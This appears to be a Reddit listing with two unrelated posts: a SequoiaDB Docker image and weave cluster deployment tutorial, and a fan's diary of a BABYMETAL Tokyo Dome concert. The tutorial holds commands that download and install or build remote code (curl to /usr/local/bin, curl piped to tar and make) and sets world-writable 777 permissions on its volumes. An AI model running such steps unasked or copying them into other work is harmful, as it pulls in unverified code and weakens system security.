Build SequoiaDB image

How to install docker and configure repositories is not the focus of this article; there are many related technical articles on the Internet. It should be pointed out that this article uses the Aliyun Repository, because the speed of uploading images to the official Docker repository is underwhelming. For how to register and use the Aliyun Repository, refer to this article (http://www.jb51.net/article/123101.htm).

STEP 1: Create the Dockerfile using the following simple statements:
# Sequoiadb DOCKERFILES PROJECT
# --------------------------
# This is the Dockerfile for Sequoiadb 2.8.4
#
# REQUIRED FILES TO BUILD THIS IMAGE
# ----------------------------------
# (1) sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run
# (2) installSDB.sh
#
# HOW TO BUILD THIS IMAGE
# -----------------------
# Put all downloaded files in the same directory as this Dockerfile
# Run:
#   $ sudo docker build -t sequoiadb:2.8.4 .

# Pull base image
FROM ubuntu

# Environment variables required for this build
ENV INSTALL_BIN_FILE="sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run" \
    INSTALL_SDB_SCRIPT="installSDB.sh" \
    INSTALL_DIR="/opt/sequoiadb"

# Copy binaries
ADD $INSTALL_BIN_FILE $INSTALL_SDB_SCRIPT $INSTALL_DIR/

# Install SDB software binaries
RUN chmod 755 $INSTALL_DIR/$INSTALL_SDB_SCRIPT \
    && $INSTALL_DIR/$INSTALL_SDB_SCRIPT \
    && rm $INSTALL_DIR/$INSTALL_SDB_SCRIPT
The content of the installSDB.sh script is as follows:
chmod 755 $INSTALL_DIR/$INSTALL_BIN_FILE
$INSTALL_DIR/$INSTALL_BIN_FILE --mode unattended
rm $INSTALL_DIR/$INSTALL_BIN_FILE
echo 'service sdbcm start' >> /root/.bashrc
It should be noted that this example uses SequoiaDB Enterprise Edition 2.8.4. You can also download the Community Edition from the official SequoiaDB website (select the tar package, download and extract it) and replace the installation media name in this example. SequoiaDB website download address: http://download.sequoiadb.com/cn/

STEP 2: Create an image
The root user executes:
docker build -t sequoiadb:2.8.4 .
If you are a normal user, use sudo:
sudo docker build -t sequoiadb:2.8.4 .

STEP 3: Log in to the Aliyun Repository
docker login --username=xxx registry.cn-hangzhou.aliyuncs.com
Here xxx is the account you registered with Aliyun.

STEP 4: View the local SequoiaDB image id
docker images

STEP 5: Tag the local image and push it to the Aliyun Repository
docker tag 04dc528f2a6f registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb:latest
docker push registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb:latest
Here 04dc528f2a6f is the author’s local sequoiadb image id, registry.cn-hangzhou.aliyuncs.com is the Aliyun Repository address, 508mars is the author’s namespace in Aliyun, sequoiadb is the image name, and latest is the tag.

Start the SequoiaDB cluster with containers

Docker’s network defaults to bridge mode, and containers in bridge mode have the following characteristics:
1) Containers on the same host can ping each other
2) Containers on different hosts cannot ping each other

However, a SequoiaDB cluster requires all nodes to reach one another, so if the SequoiaDB containers run on different hosts, docker's default network mode is clearly unsuitable. There are many ways to solve connectivity between containers on different hosts. This article only introduces the weave virtual network solution, because weave also provides a DNS server. When deploying a SequoiaDB cluster with containers, this means it is no longer necessary to modify /etc/hosts inside each container, which greatly simplifies automated deployment.
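To see concretely what weave's DNS saves you from, here is a small, purely illustrative Python sketch of the /etc/hosts bookkeeping you would otherwise have to script for every container (the host names follow this article; the IP addresses are made up):

```python
# Sketch: generating the /etc/hosts entries that weave's built-in DNS
# makes unnecessary. All IP addresses here are hypothetical.

def hosts_entries(containers):
    """Render /etc/hosts lines for a {name: ip} mapping."""
    return [f"{ip}\t{name}.weave.local {name}" for name, ip in containers.items()]

cluster = {
    "sdbserver1": "10.32.0.1",
    "sdbserver2": "10.32.0.2",
    "sdbserver3": "10.32.0.3",
}

for line in hosts_entries(cluster):
    print(line)
```

With weave, none of this bookkeeping exists: each container resolves the others by name through weave's DNS as soon as it is started with `eval $(weave env)`.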

STEP 1: Install weave
curl -s -L git.io/weave -o /usr/local/bin/weave
chmod a+x /usr/local/bin/weave
Weave needs to be installed on all hosts. The author uses three virtual machines as hosts: sdb1, sdb2 and sdb3.

STEP 2: Start the weave network
weave launch
The weave image will be downloaded the first time it is started.

STEP 3: Download the SequoiaDB image from the Aliyun Repository
docker pull registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

STEP 4: Create the docker mounted volumes on all hosts
cd /home/sdbadmin
mkdir -p data/disk1 data/disk2 data/disk3
mkdir -p conf/local
chmod -R 777 data
chmod -R 777 conf
The location of the mounted volumes can be customized, but in general two kinds are needed: one for storing collection data, such as data/disk1, data/disk2 and data/disk3, and one for storing node configuration information, such as conf/local in this example. This way, even if a container is deleted by mistake, you can start a new container to take over the role of the one that was accidentally deleted.

STEP 5: Start the containers

sdb1:
weave stop
weave launch
eval $(weave env)
docker run -dit --name sdbserver1 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

sdb2:
weave stop
weave launch
eval $(weave env)
docker run -dit --name sdbserver2 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

sdb3:
weave stop
weave launch
eval $(weave env)
docker run -dit --name sdbserver3 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

Here 11810 is the cluster access port exposed externally through the IP address of sdb1. The host volume that stores node configuration information must be mounted at the container's /opt/sequoiadb/conf/local directory, while the volume that holds table data can be mounted at a user-defined directory; once the cluster is created, however, this cannot be changed. The machine name must be specified when starting the container, because after the cluster is built the machine names are saved in SequoiaDB's system tables; a node whose machine name is inconsistent with the system table cannot join the cluster. When using weave, it is recommended to set the machine name with the --name option rather than --hostname: the latter prevents weave from registering the machine name in its DNS server, whereas weave automatically derives the machine name from the value of --name, appends the weave.local domain, and adds the result to the DNS server.
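Since the three docker run invocations above differ only in the container name, the pattern is easy to template when scripting a deployment. A minimal Python sketch (the image path, ports and volume paths are the ones used above; the helper itself is just an illustration, not part of any tooling):

```python
# Sketch: building the per-host `docker run` command used above.
# Only the container name varies between sdb1, sdb2 and sdb3.

IMAGE = "registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb"

def run_command(name):
    """Return the docker run command line for one cluster host."""
    return (
        f"docker run -dit --name {name} -p 11810:11810 "
        "-v /home/sdbadmin/data:/data "
        "-v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local "
        + IMAGE
    )

for n in ("sdbserver1", "sdbserver2", "sdbserver3"):
    print(run_command(n))
```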

STEP 6: Copy the script that creates the SequoiaDB cluster into the container
docker cp create_cluster.js sdbserver1:/data
The content of create_cluster.js is as follows:
var array_hosts = ["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"];
var array_dbroot = ["/data/disk1/sequoiadb/database", "/data/disk2/sequoiadb/database", "/data/disk3/sequoiadb/database"];
var port_sdbcm = "11790";
var port_temp_coord = "18888";
var cataloggroup = {gname:"SYSCatalogGroup", gport:"11820", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]};
var array_coordgroups = [
    {gname:"SYSCoord", gport:"11810", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]}
];
var array_datagroups = [
     {gname:"dg1", gport:"11830", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
    ,{gname:"dg2", gport:"11840", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
    ,{gname:"dg3", gport:"11850", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
];
var array_domains = [
    {dname:"allgroups", dgroups:["dg1", "dg2", "dg3"], doptions:{AutoSplit:true}}
];

println("Start the temporary coord node");
var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm);
oma.createCoord(port_temp_coord, array_dbroot[0]+"/coord/"+port_temp_coord);
oma.startNode(port_temp_coord);

println("Create catalog node group: "+cataloggroup.ghosts[0]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport);
var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord);
db.createCataRG(cataloggroup.ghosts[0], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport);
var cataRG = db.getRG("SYSCatalogGroup");
for (var i in cataloggroup.ghosts) {
    if (i==0) {continue;}
    println("Create catalog node: "+cataloggroup.ghosts[i]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport);
    var catanode = cataRG.createNode(cataloggroup.ghosts[i], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport);
    catanode.start();
}
println("Create the coord node group");
var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord);
var coordRG = db.createCoordRG();
for (var i in array_coordgroups) {
    for (var j in array_coordgroups[i].ghosts) {
        println("Create coord node: "+array_coordgroups[i].ghosts[j]+" "+array_coordgroups[i].gport+" "+array_dbroot[0]+"/coord/"+array_coordgroups[i].gport);
        coordRG.createNode(array_coordgroups[i].ghosts[j], array_coordgroups[i].gport, array_dbroot[0]+"/coord/"+array_coordgroups[i].gport);
    }
}
coordRG.start();

println("Remove the temporary coord node");
var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm);
oma.removeCoord(port_temp_coord);

println("Create the data node groups");
var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport);
var k=0;
for (var i in array_datagroups) {
    var dataRG = db.createRG(array_datagroups[i].gname);
    for (var j in array_datagroups[i].ghosts) {
        println("Create data node: "+array_datagroups[i].gname+" "+array_datagroups[i].ghosts[j]+" "+array_datagroups[i].gport+" "+array_dbroot[k]+"/data/"+array_datagroups[i].gport+" "+array_datagroups[i].goptions);
        dataRG.createNode(array_datagroups[i].ghosts[j], array_datagroups[i].gport, array_dbroot[k]+"/data/"+array_datagroups[i].gport, array_datagroups[i].goptions);
    }
    dataRG.start();
    k++;
}

println("Create the domains");
var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport);
for (var i in array_domains) {
    println("Create domain: "+array_domains[i].dname+" "+array_domains[i].dgroups+" "+array_domains[i].doptions);
    db.createDomain(array_domains[i].dname, array_domains[i].dgroups, array_domains[i].doptions);
}
docker exec sdbserver1 su - sdbadmin -c "sdb -f /data/create_cluster.js"
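The group and port layout hard-coded in create_cluster.js is easy to get wrong when adapting it to your own hosts: every group runs one node per host, so on any single host no two groups may share a port. A quick sanity check of that plan, as a standalone Python sketch (the group names and ports mirror the script above; this is not part of the SequoiaDB tooling):

```python
# Sketch: verify the port plan used in create_cluster.js is
# collision-free. Each group places one node on every host, so
# each group's port must be unique across groups.

groups = {
    "SYSCatalogGroup": 11820,
    "SYSCoord": 11810,
    "dg1": 11830,
    "dg2": 11840,
    "dg3": 11850,
}

ports = list(groups.values())
assert len(ports) == len(set(ports)), "port collision between node groups"
print("port plan OK:", sorted(ports))
```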



SequoiaDB uses container technology to achieve rapid cluster deployment, which greatly simplifies installation and deployment for beginners. Later, the author will also do some optimization of the SequoiaDB image build, because the image currently produced is a bit large. The main reason is Docker's layered image model: using the ADD or COPY command to copy the installation media into the container creates a new layer (image1); even though the media is deleted in the finally generated image (image2), image2 sits on top of image1, so its size still includes the media. Thus, it is best to use the ADD command to copy a tar package (ADD decompresses it automatically), or to download, unpack and build within a single RUN instruction, as follows:
RUN mkdir -p /usr/src/things \
    && curl -SL http://example.com/big.tar.xz \
    | tar -xJC /usr/src/things \
    && make -C /usr/src/things all
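The layering behavior described above can be illustrated by comparing two hypothetical Dockerfiles (the installer name and URL are made up). In the first, ADD bakes the installer into a layer that a later rm cannot shrink; in the second, the download, install and cleanup all happen inside a single RUN, so the installer never persists in any committed layer.

```dockerfile
# Variant 1: ADD creates a layer containing the installer; the later
# `rm` hides the file, but the layer (and the image size) keeps it.
FROM ubuntu
ADD big-installer.run /opt/
RUN /opt/big-installer.run --mode unattended \
    && rm /opt/big-installer.run
```

```dockerfile
# Variant 2: download, install and delete within one RUN instruction,
# so the installer never lands in any committed layer.
FROM ubuntu
RUN curl -SL http://example.com/big-installer.run -o /tmp/big-installer.run \
    && chmod 755 /tmp/big-installer.run \
    && /tmp/big-installer.run --mode unattended \
    && rm /tmp/big-installer.run
```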
submitted by sequoiadb to u/sequoiadb

2017.02.28 16:29 Facu474 The most distant Kitsune - Tokyo Dome Trip - Part 6 - The Metal Resistance Continues

WALL OF DEATH… ehh I mean Text
Hello again! This is a continuation of my story. Here you can find Part 1 (the rest in the comments). This part is all about TOKYO DOME - Black Night and the end of my trip.
I am sorry, but this part is by far the longest (I stopped because I reached Reddit's 40000 character limit), but I figured I shouldn't post another part with just my conclusions alone. Also, I think I should publish this, lol, 28,000 words, 45 pages, and counting.
I am sorry for the long wait. We’ve had the absolute worst heat wave, 42C every single day for the past week, and a terrible storm on Tuesday did nothing to help. It actually made things worse; this was my highway (yes, highway) offramp, here is a video. Some poor people decided to take the surface road; needless to say, it didn’t end well. All of this has led to long blackouts, so I couldn’t do anything. Thankfully, the weekend arrived and power is now stable (still hot though), and Monday and Tuesday are holidays, so it gives me extra time for this. We also got an eclipse on Sunday! But please, now, enjoy…
Tuesday - 20th (Black Night): I woke up to see that there were several videos from last night, I wanted to watch them all, and the dresses from the night before (I hadn’t even seen them, I only saw ants move across a stage), but I had to leave early to go to see a family member of mine. He lives near Shibuya. He’s been living in Japan for over 50 years, and I hadn’t seen him since I was a kid. So I went (very difficult to find the platform for his train line in Shibuya Station, it’s at the very end). I got off and it was a pretty small station, a lot of people my age, though, because there was a university nearby. I loved that I came to see him because I was able to walk through some very Anime-like neighborhoods, crossing the train tracks, and everything. I found the house (at the very end of his complex). I brought him some food from Argentina, and we spoke for a while, it was a nice experience.
After leaving, I went back to Akihabara, where some redditors (shackonthetarget, zarcka_metal, bogdogger, and... I don’t know the other one’s username, sorry, if you see this please tell me) were in a Maid Cafe, and I decided to join them. When trying to find the building, I saw a maid outside giving out fliers; I asked her (she spoke better English than my hotel staff, lol) and she directed me into the building behind her. It was floors and floors of games, and I just couldn’t find where I had to go. Turns out, you had to get on the elevator on the first floor :/ I finally got there, and saw them. I really can’t speak perfectly about this, it was a really weird experience, especially since I haven’t seen any Anime. I knew none of the phrases they were saying, but… it’s something I think everyone should do in Japan. The food was adorable, and so were the maids. We were able to keep the bunny/cat ears. Can’t say I have put them to any use. lol. The coolest part was that they were playing BABYMETAL over the speakers for us (we didn’t even ask), and one of them went on stage and sang Headbanger!!! She knew all the moves! That was seriously a really cool part of the trip. Thanks to shackonthetarget for the idea!
After eating, we then headed just half a block over to… Trio :) Well, in reality, we kinda did more in the rest of the building (Akihabara Radio Kaikan). Mostly in the rest of the Anime shops. Shackonthetarget was very excited at all the things sold. Now that I have seen some Anime, I understand, and know some characters. But at the time, I didn’t really know any. But it was still super funny the NSFW positions some Anime girls were put in, like, not even subtle.
Tokyo Dome
After that, we headed to Tokyo Dome. It didn’t stop raining (thanks typhoon). I went with some to a 7/11 (like I didn’t know enough of them already), because they had to take out cash (The Maid Cafe was not cheap). Everyone went to their hotels, and I waited there for like half an hour. I saw a billboard in the middle of the “mall” in Tokyo Dome City, it was Himeka!!! I am sad to say I can’t find the picture I KNOW I took… Oh well… I waited until shackonthetarget and zarcka_metal came back, and we went to an English pub there (called The HUB). They had this on the wall, which I couldn’t stop laughing about (technically, Celtic does use it from time to time, but that chant is associated way more with Liverpool, lol). They were playing BABYMETAL too, and with reason, since it was full of kitsunes. We spent like an hour or two talking, and drinking. An hour before the show was going to start we headed to the Dome. I was laughing because of the number of people who had an extra ticket for the show. They were trying to give them away for free (they were all gate 41, my section, lol), if only I had known. Some were exchanging them in the Tokyo Dome Hotel lobby. One person in the group (was it BigBobby2016?) couldn’t find the hotel. We were laughing our asses off because this is what you see from the Tokyo Dome, there are no towers even close to its height in the area, and the name is on the top, lol.
We separated at this point, I stood at the entrance for a few minutes, maybe I could see a famous BM fan, or the ones I knew. I did get to meet the girls from the video circulating at the time (no picture, I didn’t want to put them, or their parents in a tight spot, they are young after all. I did catch them in a video I took, though (only briefly).
No line this time, since we entered much after the gates opened. This seat was much better than yesterday’s, I would say one of the best seats, I had the middle (front) of the stage directly in front of me. I was high up, but this meant I had a great view of the entire stadium, especially considering I was just before the veranda, and next to the aisle. And as I waited for the show to start, I saw a familiar face, gardiguy, he got one of the free tickets, and was a few seats behind me, so I went over to him and talked a bit. He was actually supposed to be at the Sumo championship, he said he had fun, but that he got bored (the presentations take ages for a 5 second fight). I had told him he would prefer BM over that. Then, maron-metal’s wife appeared, Eriko. She had the other seat next to gardiguy, we talked a little more, but I left as the “owners” of the seat came, not before taking a picture! Sorry Eriko, got you with your eyes closed :/ We were also sending pictures of our views (on the Line group), and look at the terrible seat sho-taBlue got, poor guy.
As you can see in the picture, I wore the Argentina jersey. I had actually wanted to take the flag I had, but I didn’t want to get into any trouble, or bother any one around me. This was a great compromise. Plus, I knew I would be easily spotted. And, I was, I can see myself in the ProShot!!!

Black Night

So, I sat in my spot, put on my corset, and had the Onedari Dollars, and Awadama Balloons in my pocket; since they weren’t played the day before, I knew they would be played today. So… the lights started dimming down again… Ohh the excitement filled the air…
Show Start: Koba appeared again… I can’t remember, but I’m sure at least 99% of what was said was the same as Red Night. Then, another video started… with the BABYMETAL DEATH Intro. Fuck Yes!!! The best song to start a show with!!! Every time I hear it, I get goosebumps. The video started explaining how the whole world joined here this night, I felt so good being a part of this. The woman in the video asked if we were ready to headbang. “Yeah!!!” Then again: “the Fox God can’t hear you. Are you ready to Headbang?!” “YEEEAHHHH!!!!” Everyone screamed!
Song 1: I can’t explain how loud I shouted every single letter: “B” “A” “B” “Y” then, the “M” that the Japanese pronounce more like an “L-O”, that one’s kinda tricky. And so on… In my section, most people didn’t jump, but I wasn’t about to let that change me, I jumped like I was in THE ONE section, almost hitting the person next to me each time. Then came “Death” (desu) ”Death” “Death”… I love it with that long outro with the lights behind the girls.
Song 2: Awadama Fever, all I can say about this song is: “AHH… YEAH! Tondeke, ba ba baburu gamu!” (I don’t care its a Su part, I sang anyway!) Plus, I really enjoy the middle break, and the “1, 2, 3, 4 !” ..n “Hii fuu mii yoo!” I love this song because since most movements are with the arms, and not too complicated, Su can join in the choreography with Yui & Moa, more-so than usual. (I just noticed in the second video almost at the end the little dance Yui does… Love it!]
Song 3: Ohh yeah… I could hear a “motorcycle” (at least, thats what I think of when I hear it). One of my favorites is coming, and I think supremely underrated… Uki Uki Midnight!!! I love electro-pop, plus some added Metal in the background, you get a masterpiece. Again… I thought I was going to lose my voice completely… only 3 songs in, and they were some of my favorites… I knew the Ainote perfectly, and shouted every, single, one. “You and ME”! Plus that end segment is one of my favorite BM moments… (I hope they add a little more of the wide shot with the lights in the Delorean) This is turning in to an awesome show!
Song 4: We could hear drums… that means it’s META time. I gotta say, at this point I was thinking “great, a “slow” song” (one I particularly never got the feeling for). Ohhh, boy, was I wrong. I thought the only choreography was the slow walk back and forth, but these little “jiggles” by Yui and Moa… they caught me. And the deal was finally closed with the “oooohhhh… oooohhh…. “ chant. (THAT I APPEAR IN!!!) That part was just too impressive, I did not expect anything like it. By FAR one of my favorite moments of the shows. I wasn’t too fond of Meta Taro, but when you heard all the stadium singing in unison, it gave a new meaning to the song, I will never forget that.
Song 5: Sis Anger Another one I couldn’t really “get”, sadly… I still can’t get it. To me they removed from this song the reason I listen to BM… Kawaii + Metal, Pop + Metal. I am not saying I dislike the metal portion… I love it, but I don’t like how they changed the girls’ tone of voice. I do love the intro though… I’ll get it at some point… It did give us this gorgeous Yui silhouette…
Song 6: Another amazing intro… (I LOVE INTROS!!!!) They really hype the song more than if it were just played… I think context is as important as the main subject. It was Mischiefs of the Metal Gods. Boy… are their mischiefs good. The Kami band (to me) has become such an essential part of BM. I can’t imagine BM without them… Boh is just…. The best. His part with everyone clapping is just freaking amazing! It makes a guy shed a tear how he can play with both hands. But don’t think I don’t share any love for the rest. Ohmura always goes crazy, even when not in the spotlight. LEDA is methodical, he is always 100% concentrated on what he is doing, throwing a face every now and then.
Song 7: Obviously… after a Kami solo… comes Su solo. Another INTRO!!! This time it’s a slow piano + orchestra intro. It really is music to present the queen. Yui and Moa get some hijinks stories, a perfect fit, while the Queen gets proper Royal entry music. I am conflicted, but if someone asks me my favorite song, it’s either Akatsuki, or Kimi to Anime ga Mitai (I know, completely different). One wasn’t (and might never again be) played. So Akatsuki definitely was going to be my favorite. The thing with Su solos is the lack of participation. Black BM songs are essentially 50% crowd participation (4 no Uta is like 90%). But this seems like I say it is bad… NO! We are watching a spectacle. With MoiMoi, we have fun WITH them. With Su… I would say we watch her have an inner battle… could be anything, only she knows, but we do see her get better and better at it. Every time she gets on the stage she immediately steals the spotlight, and doesn’t waste it one bit.
Song 8: Onedari Daisakusen. My favorite Black BM song. I love this song, but with the lack of fancams and it not being in the WOWOW broadcast… I can’t seem to remember much. I can tell you my favorite part is the break in the middle with: “One for the money, two for the money…, money, money, money…” and then the “Katte! Katte! Katte! … Chodai! Chodai! Chodai!…”
Song 9: No Rain No Rainbow. Another song I had underestimated. Note, I loved this song. It’s the only BM song my family can listen to, I have played the Budokan Live for the past year, can’t wait to be able to switch to the Tokyo Dome version; if they liked Budokan, they will love Tokyo Dome’s version. When I say I underestimated it, it’s because I didn’t believe it could be THAT much more impactful live, since it’s a slower, less loud, song. But I was entirely wrong, I would say it’s one of the songs that most improves in the live version. You can feel Suzuka put all her strength into the vocals of this song, killing every note. The same goes for the Kami, they seem to be emotionally involved in the song as well, the guitar duets really shine in this one. Since it wasn’t released in WOWOW, I did a little “Remaster”; adding the Intro, and using the best video I found, with the bootleg audio. I am truly sorry for those that were saluted by the Queen at the start of the song, we know that is impossible to survive, RIP.
Song 10: Doki Doki Morning. The one that started it all some 6 and odd years ago. Amazing they can still play it with such spirit after all these years. You can (obviously) see a huge improvement. Moa now remembers when to start, lol. The three girls reappeared, all on the upper stage! How are they gonna dance up there? It’s so small! Somehow, they found a way to do so. This song was so fun, after a very emotional No Rain No Rainbow, it brought everyone back up!
Song 11: “Kitsuneeee…” Ohh shit…. Here comes the fan favorite (at least, under my understanding). By far… no other song is close… Megitsune. This song was even more powerful given we visited the shrine where they filmed the MV the night before. As soon as it started with just the first “SORE!” I immediately knew it was everyone’s favorite, far louder than anything else I had heard up to then, everyone was putting all their strength here. The best part: I didn’t expect a C&R at all… but we got one! Just after the slow part of the song: “Are you Ready? Are you ready TOKYO DOME!?!!” I don’t even know what Yui or Moa said, but I shouted with everyone anyway! “Soiya Soiya Soiya Soiya….” “SORE!” (X2!!!) I expected the doubled “sore” part even less… But I’m so glad we had it… it really helps.
Song 12: Gothic Music? You better bet it’s some Head Banger!… “but I had head banged too much, how can this song live up to its name now?” Ohh… if only I could have shut my mouth… I barely knew what was about to come. The first part… completely standard. Same callbacks as always (only louder because there were so many more people than usual). Then… the longest headbanger in history. My arm hadn’t even been able to rest from the night before… I really thought my arm was going to literally fall off. I had to switch arms… I just couldn’t continue with both. I knew at this point how much THE ONE must train their heads and arms for this. I was doing some major amateur work. I also noticed the Kami were into it too… the 3 (Ohmura, LEDA, and Boh) were on the floor (must be really hard to play). Again, no idea what Yui or Moa were saying… lol. Even Su got some talk in! Sadly (or thankfully, at least) a guy who was on the floor bowing down over and over was shown only a second on the WOWOW broadcast. But I remember clearly from the show, he was shown on the big screen for a VERY long time, must have been well over 30 seconds. There was also smoke, but I was surprised MoiMoi didn’t get an upgrade and get some cannons by this point… (Note for Koba next time ;).
Song 13: The “oh so famous” piano Intro (with Su’s voiceover) started. First I thought it was odd it was in English, though the whole show was like that. But more importantly, I clearly saw they changed what was usually said to include the lighting of the corsets. (Talking about “linking our hearts together”) Actually, the whole thing was mostly changed. At this moment the corsets lit up (with RED this time!!). Sadly, I have to say my corset didn’t work this time :( It’s difficult to see with it on, so I took it off for a second, and saw the light was NOT working… Oh well, nothing I can do now. Then, Su appeared, and Yui and Moa on the end of the coffin platforms! At this moment I looked at the crowd, to see if they would maybe move the chairs to the side and MOSH! Nope. Yui and Moa started their run, and the whole stage was “set on fire”. Actually, small fires remained through the whole song.
Encore: A sad part, to see the end of the shows. But the crowd was as wild as ever, and the Kami and the girls were really loose now. I clearly remember (and am helped by the pro-shot) Su’s face after the first set of “We are BM!” First she had the biggest grin on her face, and she immediately turned into a “you’re damn right we are” face. You could see her through the entire thing, she was ecstatic. I talk more about Su, because even during the songs (especially Black BM) you get to see Yui and Moa act more. But that’s not to say they (and even the Kami) weren’t letting out all the energy they had left! I was in awe looking at the entire stadium, everyone shouting in unison “We Are BM!!!” Ever since I first saw the Budokan Blurays this had been a dream, to be in Japan shouting the famous phrase. I was so into it, that I missed the now incredibly famous moment: Su’s slip. I did see her on the floor, though, since the whole stadium shouted: “Oooohh” as soon as it happened. Then Yui almost slipped as well! MoiMoi grabbed each other, trying not to slip themselves. They got to the end, hugging each other. This is, by far, the most memorable moment of the trip. And then Su giving Yui and Moa a moment with the Mic. They seemed thrilled she would offer it. And it added some confusion with Moa. They then went to the center stage, did a “We are BM!” again, and disappeared! But we were not alone, for the Kami came out, poor LEDA slipping in the same spot as Su.
Just so you know why things might get a bit moody from here on out, while I wrote this, I was listening to X Japan’s Tears, Say Anything and Art of Life, a deadly combination.
X Japan has a HUGE role in BM existence; if you can, please go see them at Wembley on March 4th.
When it ended, this time I wasn’t as… pensive, as last time. I didn’t have ANY type of BM blues, like the day before, because this time, I had something to do. With the meet up group, we were set to meet outside the stadium. Before leaving my seat (having nothing to “lose” now), I took 3 pictures (I don’t know why I didn’t just take an F***ing Panorama). So, I started out. While trying to get outside, the pressure from inside and the wind pushed you out, lol. As I got down to the bottom of the stairs, some guys saw my t-shirt and shouted: “Vamos Argentina!!!” I was laughing so much, and answered with a fist in the air: ”Asi me gusta! Vamos Japon, tambien!” Everyone around us had a horror look on their face, like I was shouting like some demented preacher. Too bad I didn’t stop and take a picture, I wanted to make sure I didn’t miss my group. I got to the entrance, and waited 2 minutes before aunthor appeared. He told me he had seen me in the stadium, that he was just a couple (couple much) seats behind me. Too bad I didn’t know at the time. We were set to go to the HUB pub. We went there (just a few hundred meters away), still raining. The place was packed, with no sign of our group. They sent a message, they were looking around the Suidobashi station for somewhere to eat, so we headed there. The station was packed, again. While we waited I went over to a guy selling sets of printed pictures of some BM shows. Koba would have probably gone livid if he saw this (remember Mexico).
We got a message. They had found a restaurant, on the other side of the station from Tokyo Dome. They sent a picture of the front so we could spot it. We walked towards it, trying to find it, and we spotted Kentosdad, who had come outside to signal us, in case we missed it. Bless him, he was waiting in the heavy rain; he even stayed outside for others that were coming. We went upstairs, again, you had to remove your shoes before going inside. We entered and found our group, we took up an entire section (4 tables) of the restaurant. As I was sitting down, I realized I hadn’t used any of nabazul’s gifts :/ Yelp… ehhh, better not say anything. :( Everyone was trying to get everything they saw during the night out at the same time, it was impossible, but we finally could talk slowly about each part of the show. I remember xacto_knife talking about how everyone was off-sync in the Megitsune “wave”. I had noticed it too while we were doing it, everyone was moving off-beat. Everyone was shouting when they had their arm behind their head, when it should be in front of their head. At the time I thought it had to do with the time it took for the sound to move across the stadium, but if you see in the video, even the people some rows back were doing it wrong (while the front row was doing it right). We talked about why the baseball net was still up; it kinda blocked the view for some. When everyone had arrived we finally started ordering. Poor kentosdad had to order everything from this tablet on the table, there were so many orders! Looking around us, most of the tables (if not all) were BM fans. Some were getting quite drunk, from what one could hear (shouting) lol. A couple (a man and a woman) at a table next to us were curious. They asked some questions, where we were from, and whatnot. Some from our group gave them their fan creations. I think pepcok’s chains, and DaemonSD’s pins/keychains? After this they wanted a picture with all of us, we obviously obliged.
I can’t remember why, but we took another picture without the guy, but with the girl. Not that I’m complaining. I can’t even remember what we ate that night, I had so many thoughts crossing my mind.
We stayed there talking about the shows until like 12, when some of us had to leave (because trains stop at like 1 AM, don’t want to be left stranded). We all said our goodbyes, and those who didn’t stay in this area headed to the station. I went on the train with Kentosdad, and someone else (who was it?). This other person got off at the first station. And I continued with Kentosdad to Akihabara (2nd station). Knowing this was the end of my journey, I thanked him, and we waved goodbye. I got to the hotel around 1:30AM. I got a picture of an almost deserted Akihabara Station. I kinda stayed there for a minute watching, knowing this was my last night. When the trains stopped passing, I decided it was time, and went to bed.
Wednesday (9/21) I woke up to see this. Busted… lol (look who is in the background). Let's just say… someone *cough* kentosdad *cough* had called in sick for Tuesday… Needless to say, I don’t think BM fever is an acceptable condition to miss work over. I knew I would return home in the afternoon, so I packed my things, checked out, and left my bag in the lobby. Before I left, I had to make one last stop at Trio. I went over, and happened to meet two foreigners there. It just so happened they were suzukayuimoa and fukei-metal. The funny thing is, we didn’t know we were all redditors! We only found out when I recognized suzukayuimoa in his post, and fukei-metal happened to appear in the comments! What a small BM world. I ended up buying the Land of the Rising Sun T-shirt. I really liked it, ever since I saw the Japan map on the back. But I was still searching for the Doodle sweatshirt, and I didn’t find it anywhere :( (However, I just bought it last week on Buyee :).) We walked around Akihabara together a little, entering a few shops with some BM things. I forgot to take pictures this time :/ We ended up separating when we entered a shop; I decided to stay a while longer to buy gifts for friends and family. As soon as I got everything I wanted, I headed back to my hotel. But I just couldn’t, I had something in the back of my mind controlling me, saying: “You must buy something else.” Sigh… I went back to Trio… Thankfully, I had the mindset to buy something cheap, so I ended up getting this Yui SG “signed” postcard. Ironically, it's something I am very grateful to have purchased; I love the little postcard.
